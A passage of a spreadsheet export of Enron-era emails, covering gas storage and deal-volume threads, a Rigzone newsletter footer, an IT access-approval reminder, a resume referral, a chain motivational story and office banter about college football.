  &lt;http://www.rigzone.com/images/email/title_tab_RZMarket.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	featured equipment:	_x000D_
West Africa Located Cooper LTO 750 &lt;http://www.rigzone.com/market/surplus_listing.asp?eq_id=100&gt;	_x000D_
 &lt;http://www.rigzone.com/market/surplus_listing.asp?eq_id=100&gt;_x000D_
	_x000D_
Ambar Marine 26' Fast Rescue Boats &lt;http://www.rigzo!&gt;	_x000D_
 &lt;http://www.rigzone.com/market/surplus_listing.asp?eq_id=419&gt;_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
more equipment &lt;http://www.rigzone.com/market/&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/email/title_tab_RZCareerCenter.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/s!&gt;	featured jobs:	_x000D_
-	Reliability Assurance Engineer &lt;http://www.rigzone.com/jobs/job_posting.asp?p_id=1073&gt;	_x000D_
-	Paramedic, Safety Rep &lt;http://www.rigzone.com/jobs/job_posting.asp?p_id=957&gt;	_x000D_
-	Research Analyst &lt;http://www.rigzone.com/jobs/job_posting.asp?p_id=1067&gt;	_x000D_
more hot jobs &gt;&gt; &lt;http://www.rigzone.com/jobs/hot_jobs.asp&gt;	_x000D_
featured candidates:	_x000D_
-	! Senior Financial Manager &lt;http://www.rigzone.com/jobs/resume.asp?r_id=8883&gt;	_x000D_
-	Drilling and Completion, Workover Engineer/Consult &lt;http://www.rigzone.com/jobs/resume.asp?r_id=10875&gt;	_x000D_
-	Senior Well Supervisor &lt;http://www.rigzone.com/jobs/resume.asp?r_id=10869&gt;	_x000D_
search for candidates &gt;&gt; &lt;http://www.rigzone.com/jobs/search_resume.asp&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images!&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	Drillships:	_x000D_
To 5000':	57.1%	(8/14)	_x000D_
+5000':	96.0%	(24/25)	_x000D_
Semisubs:	_x000D_
2nd Gen:	70.8%	(51/72)	_x000D_
3rd Gen:	86.0%	(43/50)	_x000D_
4th Gen:	100.0%	(38/38)	_x000D_
5th Gen:	85.7%	(6/7)	_x000D_
Jackups:	_x000D_
To 200':	55.2%	(37/67)	_x000D_
200' MC:	50.0%	(12/24)	_x000D_
200' MS:	14.3%	(3/21)	_x000D_
300' IC:	90.6%	(87/96)	_x000D_
+300' IC:	94.4%	(51/54)	_x000D_
Severe Env.:	85.7%	(18/2! 1)	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
view complete utilization report &lt;http://www.rigzone.com/data/utilization_trends.asp&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/email/title_tab_OilPrices.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	Light Crude Oil:	! $20.29/BBL _x000D_
(-1.98%)	_x000D_
Brent Crude Oil:	$19.88/BBL _x000D_
(-3.12%)	_x000D_
Natural Gas:	$2.37/MMBtu _x000D_
(-2.47%)	_x000D_
Unleaded Gasoline:	$0.58/gal _x000D_
(-1.69%)	_x000D_
prices from:	2/20/2002	_x000D_
change since:	2/19/2002	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Promotional Opportunities_x000D_
Become a Sponsor, feature your job opening or, advertise your upcoming industry conference. Click here &lt;http://www.rigzone.com/advertise/&gt; for more information, send your press release to info@rigzone.com &lt;mailto:info@rigzone.com&gt; or call! us at 281-345-4040._x000D_
_x000D_
Member Services_x000D_
If you no longer wish to receive this newsletter, you may unsubscribe by clicking here &lt;http://www.rigzone.com/daily_unsubscribe.asp&gt; or by logging in to Rigzone and updating your profile. You can also change the format you receive (HTML or Text) and your email address by logging in and updating your account. Click here to log in &lt;http://www.rigzone.com/login.asp?returnURL=/member_register.asp&gt;._x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	</t>
  </si>
  <si>
    <t>Thu, 9 Mar 2000 05:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: SST Storage Injection Contract for Choice - PLEASE READ</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff Porter and I have discussed this several times over the last week._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: Joan Veselack/Corp/Enron@ENRON_x000D_
cc: dkinney@columbiaenergygroup.com@ENRON, Chris Germany/HOU/ECT@ECT, Scott _x000D_
Goodell/Corp/Enron@ENRON, Katherine L Kelly/HOU/ECT@ECT, Victor _x000D_
Lamadrid/HOU/ECT@ECT, Joann Collins/Corp/Enron@ENRON, Robert _x000D_
Allwein/HOU/ECT@ECT, John Hodge/Corp/Enron@ENRON _x000D_
Subject: Re: SST Storage Injection Contract for Choice - PLEASE READ  _x000D_
_x000D_
The Choice program storage is to be negotiated by CES-Retail.  In fact, our _x000D_
agreement with CES Retail says that they will give us actual volumes for our _x000D_
storage schedule by March 15.   Chris, have you called CES to see how they're _x000D_
coming along with the schedule?  It would be a nice, gentle reminder to call _x000D_
them a week in advance (which is today), so they can start putting it _x000D_
together.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Joan Veselack@ENRON_x000D_
03/07/2000 01:49 PM_x000D_
To: dkinney@columbiaenergygroup.com, Chris Germany/HOU/ECT@ECT, Scott _x000D_
Goodell/Corp/Enron@ENRON_x000D_
cc: Katherine L Kelly/HOU/ECT@ECT, Victor Lamadrid/HOU/ECT@ECT, Joann _x000D_
Collins/Corp/Enron@ENRON, Robert Allwein/HOU/ECT@ECT, John _x000D_
Hodge/Corp/Enron@ENRON, Colleen Sullivan/HOU/ECT@ECT _x000D_
Subject: SST Storage Injection Contract for Choice - PLEASE READ_x000D_
_x000D_
To ensure we are all on the same page... how does the renewal of this _x000D_
contract work for April 1?_x000D_
_x000D_
If I remember correctly, the injection contract is from April 1st to October _x000D_
31st. Who negotiates this with the CDC??? _x000D_
_x000D_
John Hodge thought it was Doug Mckinney in Herndon. However, the storage _x000D_
becomes Enron's on April 1st. So... does Enron negotiate?_x000D_
_x000D_
Chris, Scott, and Doug... please determine how this will be coordinated. _x000D_
Don't want this to fall through the cracks.... due to the transition._x000D_
_x000D_
Thanks for your help!!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 08:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: Big commitment</t>
  </si>
  <si>
    <t xml:space="preserve">i just explained my logic - despite losing to OU earlier in the year texas is _x000D_
actually better than them._x000D_
_x000D_
see below_x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
From:  Bryan Hull                                                             _x000D_
01/03/2001 04:31 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc: Matthew Lenhart/HOU/ECT@ECT, Timothy Blanchard/HOU/EES@EES, Chad _x000D_
Landry/HOU/ECT@ECT, Steve Venturatos/HOU/ECT@ECT _x000D_
Subject: Re: FW: Big commitment  _x000D_
_x000D_
What was the score of the UT Oklahoma game?_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Eric Bass                           01/03/2001 04:29 PM_x000D_
	_x000D_
_x000D_
To: Matthew Lenhart/HOU/ECT@ECT_x000D_
cc: Timothy Blanchard/HOU/EES@EES, Bryan Hull/HOU/ECT@ECT, Chad _x000D_
Landry/HOU/ECT@ECT, Steve Venturatos/HOU/ECT@ECT _x000D_
Subject: Re: FW: Big commitment  _x000D_
_x000D_
i am going to use a matt lenhart argument - alla texas lost to arkansas last _x000D_
year who lost to lsu.  . . .       texas played horribly against oregon and _x000D_
still had a great chance to win (and should have won) at the end of the _x000D_
game.  oregon beat washington who beat miami who beat fsu who should beat _x000D_
oklahoma tonite.  that means that texas should be national champions._x000D_
_x000D_
get real . . .  one 8-4 season after a decade of failure does not a _x000D_
championship caliber program make.  our team did the same thing right after _x000D_
mack arrived (9-3 with big win in cotton bowl) you can expect about the same _x000D_
next year._x000D_
_x000D_
lsu is getting some good recruits this year - you should be happy - in a _x000D_
couple of years your team will compete for sec and national championships._x000D_
_x000D_
but don't start talking smack after a win over a lousy ACC team._x000D_
_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc: Timothy Blanchard/HOU/EES@EES, Bryan Hull/HOU/ECT@ECT, Chad _x000D_
Landry/HOU/ECT@ECT, Steve Venturatos/HOU/ECT@ECT _x000D_
Subject: Re: FW: Big commitment  _x000D_
_x000D_
great.  he can go there with all the talent in the world and get run by the _x000D_
pac-10._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Dec 2001 17:36:33 -0800 (PST)</t>
  </si>
  <si>
    <t>Your Approval is Overdue: Access Request for_x000D_
 rodney.malcolm@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">This request has been pending your approval for  9 days.  Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000079466&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000079466_x000D_
Request Create Date : 12/17/01 4:09:11 PM_x000D_
Requested For       : rodney.malcolm@enron.com_x000D_
Resource Name       : eConnect - VPN  Tier 2 - Full Access_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 7 Apr 2000 03:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.shoemake@enron.com', 'regina.blackshear@enron.com', 'leslie.smith@enron.com', 'yvonne.acosta@enron.com', 'dora_thurmond@uniteddc.com', 'amber.ebow@enron.com', 'suhernan@llgm.com'})</t>
  </si>
  <si>
    <t>FW: [Fwd: good story]</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 04/07/2000 _x000D_
10:25 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Maria Sandoval                           04/06/2000 01:36 PM_x000D_
	_x000D_
_x000D_
To: Andrea R Guillen/HOU/ECT@ECT, Phenicia Olivier/HOU/ECT@ECT, Bernice _x000D_
Rodriguez/HOU/ECT@ECT, Melissa Rodriguez/HOU/ECT@ECT, Cassandra S _x000D_
Dutton/HOU/ECT@ECT, Lorraine Becker/HOU/ECT@ECT, Angela Henn/HOU/ECT@ECT, _x000D_
Melba Lozano/HOU/ECT@ECT, Chantelle Villanueva/HOU/ECT@ECT, _x000D_
patty.soria@halliburton.com, elizabeth.gutierrez@eott.com, Judy _x000D_
Hernandez/HOU/ECT@ECT, Elizabeth Soto/HOU/ECT@ECT, amolina@unifirst.com, _x000D_
apena26@hotmail.com, Pamela Sonnier/HOU/ECT@ECT, Brenda _x000D_
Barreda/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Yolanda Pena/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: FW: [Fwd: good story]_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Maria Sandoval/HOU/ECT on 04/06/2000 _x000D_
02:35 PM ---------------------------_x000D_
From: Brenda Barreda@ENRON_DEVELOPMENT on 04/06/2000 12:06 PM_x000D_
To: MY BUDDIES, Iracema Hernandez/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: FW: [Fwd: good story]_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Brenda Barreda/ENRON_DEVELOPMENT on _x000D_
04/06/2000 01:05 PM ---------------------------_x000D_
   _x000D_
	Enron Engineering &amp; Construction Company_x000D_
	From:  Definia Richardson                           04/06/2000 01:02 PM_x000D_
	_x000D_
_x000D_
To: Brenda Barreda/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: FW: [Fwd: good story]_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Definia Richardson/ENRON_DEVELOPMENT on _x000D_
04/06/2000 01:02 PM ---------------------------_x000D_
_x000D_
_x000D_
"Richardson, Anthony AJ SHCAP" &lt;AR200243@MSXSOC.SHELL.COM&gt; on 04/06/2000 _x000D_
11:16:20 AM_x000D_
To: "'Definia.Richardson@enron.com'" &lt;Definia.Richardson@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW: [Fwd: good story]_x000D_
_x000D_
_x000D_
&gt;  &gt;        READ THIS.  LET IT REALLY SINK IN._x000D_
&gt;  &gt;        THEN CHOOSE HOW YOU START YOUR DAY TOMORROW._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Michael is the kind of guy you love to hate.  He is always in_x000D_
&gt; a good_x000D_
&gt;  &gt;      mood and always has something positive to say: When someone_x000D_
&gt; would_x000D_
&gt;  &gt; ask  him  how he was doing, he would reply, "if I were any better,_x000D_
&gt; I would_x000D_
&gt;  &gt; be  twins!"_x000D_
&gt;  &gt;      He was a natural motivator._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      If an employee was having a bad day, Michael was there_x000D_
&gt; telling the_x000D_
&gt;  &gt;      employee how to look on the positive side of the situation._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Seeing this style really made me curious, so one day I went_x000D_
&gt; up to_x000D_
&gt;  &gt;      Michael  and asked him, "I don't get it!  You can't be a_x000D_
&gt; positive_x000D_
&gt;  &gt; person all of  the time._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      How do you do it?"_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Michael replied, "Each morning I wake up and say to myself,_x000D_
&gt; you have_x000D_
&gt;  &gt; two choices today._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      You can choose to be in a good mood or you can choose to be_x000D_
&gt; in a bad_x000D_
&gt;  &gt; mood. I choose to be in a good mood._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Each time something bad happens, I can choose to be a victim_x000D_
&gt; or I_x000D_
&gt;  &gt; can choose to learn from it. I choose to learn from it._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Every time someone comes to me complaining, I can choose to_x000D_
&gt; accept_x000D_
&gt;  &gt; their complaining or I can point out the positive side of life. I_x000D_
&gt; choose_x000D_
&gt;  &gt; the_x000D_
&gt;  &gt; positive side of life._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "Yeah, right, it's not that easy,"  I protested._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "Yes, it is,"  Michael said.  "Life is all about choices._x000D_
&gt; When you_x000D_
&gt;  &gt; cut away all the junk, every situation is a choice._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      You choose how you react to situations._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      You choose how people affect your mood.  You choose to be in_x000D_
&gt; a good_x000D_
&gt;  &gt; mood  or bad mood. The bottom line:  It's your choice how you live_x000D_
&gt; life."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      I reflected on what Michael said.  Soon thereafter, I left_x000D_
&gt; the Towe_x000D_
&gt;  &gt;      Industry to start my own business.  We lost touch, but I_x000D_
&gt; often_x000D_
&gt;  &gt; thought about him when I made a choice about life instead of_x000D_
&gt; reacting to_x000D_
&gt;  &gt; it._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Several years later, I heard that Michael was involved in a_x000D_
&gt; serious_x000D_
&gt;  &gt;      accident, falling some 60 feet from a communications tower._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      After 18 hours of surgery and weeks of intensive care,_x000D_
&gt; Michael was_x000D_
&gt;  &gt;      released  from the hospital with rods placed in his back._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      I saw Michael about six months after the accident. When I_x000D_
&gt; asked him_x000D_
&gt;  &gt; how  he  was, he replied.  "If I were any better, I'd be twins._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Wanna see my scars?"  I declined to see his wounds, but did_x000D_
&gt; ask him_x000D_
&gt;  &gt; what had gone through his mind as the accident took place._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "The first thing that went through my mind was the well-being_x000D_
&gt; of my_x000D_
&gt;  &gt;      soon to be born daughter, "  Michael replied.  "Then, as I_x000D_
&gt; lay on_x000D_
&gt;  &gt; the_x000D_
&gt;  &gt;      ground, I remembered that I had two choices:  I could choose_x000D_
&gt; to live_x000D_
&gt;  &gt; or   I could choose to die.  I chose to live."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "Weren't you scared?  Did you lose consciousness?" I asked._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Michael continued, "...the paramedics were great. They kept_x000D_
&gt; telling_x000D_
&gt;  &gt; me I  was going to be fine.  But when they wheeled me  into the ER_x000D_
&gt; and I_x000D_
&gt;  &gt; saw_x000D_
&gt;  &gt; the expressions on the faces of the doctors and  nurses, I got_x000D_
&gt; really_x000D_
&gt;  &gt; scared..   In their eyes, I read 'he's a dead man."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      I knew I needed to take action."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "What did you do?"  I asked._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "Well there was a big burly nurse shouting questions at me,"_x000D_
&gt; said_x000D_
&gt;  &gt;      Michael.  "She asked if I was allergic to anything.  "Yes, I_x000D_
&gt;  &gt; replied."_x000D_
&gt;  &gt;      The doctors and nurses stopped working as they waited for my_x000D_
&gt; reply._x000D_
&gt;  &gt; I  took a deep breath and yelled, "Gravity."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Over their laughter, I told them, "I am choosing to live._x000D_
&gt; Operate on_x000D_
&gt;  &gt; me as if I am alive, not dead."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Michael lived, thanks to the skill of his doctors, but also_x000D_
&gt; because_x000D_
&gt;  &gt; of  his amazing attitude.  I learned from him that every day we_x000D_
&gt; have the_x000D_
&gt;  &gt; choice to live fully._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Attitude, after all, is everything._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "Therefore do not worry about tomorrow, for tomorrow will_x000D_
&gt; worry_x000D_
&gt;  &gt; about itself._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Each day has enough trouble of its own."_x000D_
&gt;  &gt;      Matthew 6:34_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      After all today is the tomorrow you worried about yesterday._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      You have two choices now:_x000D_
&gt;  &gt;        1.  Delete this._x000D_
&gt;  &gt;        2.  Forward it to the people you care about._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;         I hope you will choose #2.  I did_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 06:41:04 -0800 (PST)</t>
  </si>
  <si>
    <t>revised daily energy letter 1/22</t>
  </si>
  <si>
    <t xml:space="preserve">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Daily Energy Letter_x000D_
http://www.carrfut.com/research/Energy1/Energy-Letter1-22-02.pdf_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Jun 2000 07:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Resume - Rabi De</t>
  </si>
  <si>
    <t xml:space="preserve">Shirley,_x000D_
_x000D_
Please, set up a phone interview. Stinson, Krishna, Paulo, Grant._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 06/26/2000 _x000D_
03:02 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Bill Berkeland @ ENRON                           06/26/2000 12:20 PM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: Kim Melodick/HOU/ECT@ECT _x000D_
Subject: Resume - Rabi De_x000D_
_x000D_
Vince, thanks for returning my call. Here's Rabi's resume for your review. As _x000D_
I mentioned, I worked with Rabi for a little over a year at Shell and was _x000D_
very impressed with both his abilities and work ethic. If you would like any _x000D_
further info from me, please do not hesitate to give me a call._x000D_
_x000D_
Thanks._x000D_
_x000D_
Bill_x000D_
_x000D_
_x000D_
_x000D_
----------------------------------------------------------------------------_x000D_
_x000D_
(For Human Resources)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Bill Berkeland/Corp/Enron on 06/26/2000 _x000D_
11:08 AM ---------------------------_x000D_
_x000D_
_x000D_
Rabi De &lt;rabide@yahoo.com&gt; on 06/25/2000 08:24:07 PM_x000D_
To: Bill.Berkeland@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Resume_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Dear Bill:_x000D_
_x000D_
Thank you very much for volunteering to circulate my resume within Enron. As _x000D_
you know, I am interested in exploring career opportunities in Financial _x000D_
Engineering within Enron. I am particularly interested in joining the _x000D_
research group headed by Dr. Vince Kaminski. _x000D_
_x000D_
Enron continues to innovate its way through the energy and telecom _x000D_
marketplace using its substantial intellectual capital. The enclosed resume _x000D_
details my experience, academic background, and contributions in the area of _x000D_
risk modeling and management. Understanding risk is a core competency of _x000D_
Enron and I am excited about the possibility of working, learning, and _x000D_
growing with the very best in the industry._x000D_
_x000D_
Please forward my resume within Enron as you see fit. Thank you in advance _x000D_
for any referrals or recommendations you may be able to provide. _x000D_
_x000D_
Best regards,_x000D_
_x000D_
Rabi S. De_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Do You Yahoo!?_x000D_
Get Yahoo! Mail- Free email you can access from anywhere!_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 6 Jul 2000 00:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">I will enter this deal in the system and let you guys know what the deal _x000D_
number is._x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 07/06/2000 07:37 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
dkinney@columbiaenergygroup.com on 07/05/2000 03:55:25 PM_x000D_
To: " - *joann.collins@enron.com" &lt;joann.collins@enron.com&gt;, " - _x000D_
*scott.goodell@enron.com" &lt;scott.goodell@enron.com&gt;, " - _x000D_
*Chris.Germany@enron.com" &lt;Chris.Germany@enron.com&gt;_x000D_
cc: " - *Dalphon, Charles" &lt;cdalpho@columbiaenergygroup.com&gt;, " - _x000D_
*Destephanis, Kara" &lt;kdestep@columbiaenergygroup.com&gt; _x000D_
Subject: July Volume Request for C&amp;I customers behind COH_x000D_
_x000D_
_x000D_
Chris and all--Below is our volume request for July 7-31 for C&amp;I customers_x000D_
behind COH.  Its a similar situation to the one we had in June with C&amp;I_x000D_
customers taken over from us by Metromedia Energy.  We need to do a separate_x000D_
deal to cover these volumes like we did in June._x000D_
Please provide Kara with contract numbers in the morning.  Also, could you_x000D_
please provide the pricing on this deal?  Thanks._x000D_
_x000D_
_x000D_
COH Supply to C&amp;I Customers of MME_x000D_
July 7-31, 2000_x000D_
_x000D_
_x000D_
 MARKET_x000D_
LDC AREAS  dth_x000D_
   per day_x000D_
COH 3 3-15   0_x000D_
COH 5 5-2   0_x000D_
COH 5 5-7   280_x000D_
COH 7 7-1   1557_x000D_
COH 7 7-3   100_x000D_
COH 7 7-4   1040_x000D_
COH 7 7-5   1235_x000D_
COH 7 7-6   124_x000D_
COH 7 7-8   420_x000D_
COH 7 7-9   3131_x000D_
COH 8 8-35  80_x000D_
_x000D_
TOTALS  7967_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Doug Kinney_x000D_
Ph:  703-561-6339_x000D_
Fax:  703-561-7317_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 08:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.ross@enron.com'})</t>
  </si>
  <si>
    <t>Re: short fall $971,443.11 for Wis Elect Power</t>
  </si>
  <si>
    <t xml:space="preserve">The deal number in Sitara was changed because of an internal book name _x000D_
change.  It had nothing to do with the monetization status of the deal.  If _x000D_
this has caused a problem, let me know.  I didn't think that just changing _x000D_
the deal number would have this effect.   Thanks._x000D_
_x000D_
DG    3-9573_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Global Finance_x000D_
	_x000D_
	From:  Steve Ross                           09/19/2000 10:07 AM_x000D_
	_x000D_
_x000D_
To: Melissa K Ratnala/HOU/ECT@ECT_x000D_
cc: Darron C Giron/HOU/ECT@ECT _x000D_
Subject: Re: short fall $971,443.11 for Wis Elect Power  _x000D_
_x000D_
Any word?  I am going to send in the water fall today so please let me know._x000D_
Thanks_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Melissa K Ratnala                           09/15/2000 09:06 AM_x000D_
	_x000D_
_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc: Steve Ross/HOU/ECT@ECT _x000D_
Subject: Re: short fall $971,443.11 for Wis Elect Power  _x000D_
_x000D_
Darron, _x000D_
_x000D_
Sitara indicates that the below deal #10129 was changed to deal #312218.  _x000D_
Steve Ross with Company 103 and my records indicate that this deal should _x000D_
have been monetized until September prod.  Please let me know if you show _x000D_
otherwise, as monetized volume stopped flowing as of July production.  _x000D_
_x000D_
Thank you, Melissa_x000D_
_x000D_
_x000D_
To: Melissa K Ratnala/HOU/ECT@ECT_x000D_
cc: Audrey Cook/HOU/ECT@ECT, Shielah Castro/Corp/Enron@Enron _x000D_
Subject: Re: short fall $971,443.11 for Wis Elect Power  _x000D_
_x000D_
Melissa,_x000D_
We are missing the CIG/NNG pull for deal 10129.  The 232,500 is south TX deal _x000D_
10132 which is booked.  Past history_x000D_
has the 10129 deal pulling the same quantity as the 10132.   I am just trying _x000D_
to figure out were the other half of the monthly pull might be if in fact_x000D_
there is any.  _x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Melissa K Ratnala                           09/14/2000 01:26 PM_x000D_
	_x000D_
_x000D_
To: Steve Ross/HOU/ECT@ECT_x000D_
cc: Audrey Cook/HOU/ECT@ECT, Shielah Castro/Corp/Enron@Enron _x000D_
Subject: Re: short fall $971,443.11 for Wis Elect Power  _x000D_
_x000D_
Steve, _x000D_
_x000D_
Please field all monetized questions/requests through me.  We have many new _x000D_
faces, most of which have not yet been trained on monetizations.  We are _x000D_
actually restructuring which coordinators will be handling the monetized _x000D_
contracts and once completed, we will have firm contacts for you. _x000D_
_x000D_
To answer your question, Wisconsin Electric Power deal #10132 and 10129 are _x000D_
still valid until 9/00, but I booked invoice #13470SA on your books in Doc _x000D_
#1600000445 for 232500 mmbtu and $1,011,549.39.  Is this not what you were _x000D_
looking for?  Please explain further._x000D_
_x000D_
Thanks!  Melissa_x000D_
_x000D_
_x000D_
To: Shielah Castro/Corp/Enron@Enron_x000D_
cc: Melissa K Ratnala/HOU/ECT@ECT _x000D_
Subject: short fall $971,443.11 for Wis Elect Power_x000D_
_x000D_
Is the CIG/NNG DUMAS contract expired?  My water fall is still looking for _x000D_
monthly MMBtu and there is none for July production_x000D_
yielding  the above short fall.  Please let me know today as I am procesiing _x000D_
this months' payment._x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 04:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vance@gvtucker.com'})</t>
  </si>
  <si>
    <t>Re: reunion</t>
  </si>
  <si>
    <t xml:space="preserve">That is the plan--although she doesn't need my family, she can always hang _x000D_
out with the Cowan family_x000D_
_x000D_
_x000D_
_x000D_
	"G. Vance Tucker" &lt;vance@gvtucker.com&gt;_x000D_
	09/01/2000 01:41 PM_x000D_
		 _x000D_
		 To: richard.b.sanders@enron.com_x000D_
		 cc: _x000D_
		 Subject: reunion_x000D_
_x000D_
_x000D_
Will Julie and/or the boys be coming to Ft Worth for the reunion in Oct?_x000D_
_x000D_
Marcy may be coming down with the gang, and she'd like some company._x000D_
_x000D_
--Vance_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Oct 2001 06:16:17 -0700 (PDT)</t>
  </si>
  <si>
